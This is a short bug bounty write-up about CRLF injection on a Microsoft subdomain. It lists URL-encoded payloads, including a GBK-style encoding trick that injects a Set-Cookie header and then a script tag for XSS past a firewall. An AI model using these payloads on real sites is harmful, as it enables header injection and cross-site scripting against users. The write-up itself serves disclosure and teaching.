🤬
9a91a891
ROOT /
Web /
CRLF /
20230324 - 6000 with Microsoft Hall of Fame.md
40 lines | UTF-8 | 1 KB

$6000 with Microsoft Hall of Fame ⚔️

  1. Let’s test for the most ignored vulnerability CRLF INJECTION
     

  2. I tried with some different payloads, but I was only getting “400 Bad Request”

%0D%0A%20Set-Cookie:whoami=thecyberneh
%20%0D%0ASet-Cookie:whoami=thecyberneh
%0A%20Set-Cookie:whoami=thecyberneh
%2F%2E%2E%0D%0ASet-Cookie:whoami=thecyberneh

 

  1. I did little research and got some unique encoding called “GBK encoding”. so after URL encoding, I crafted and tried a new payload like this:
https://subDomain.microsoft.com/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=thecyberneh

And Boom!!!
20230324-1.png
 

  1. CRLF TO XSS with Firewall Bypass
ENCODING
“<” --> 嘼 --> %E5%98%BC
“>” --> 嘾 --> %E5%98%BE
https://subDomain.microsoft.com/%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE

20230324-2.png

Credit

Based on Neh Patel's writeup.
 

Support

You can Follow me on twitter or

Buy Me A Coffee

Please wait...
Page is in error, reload to recover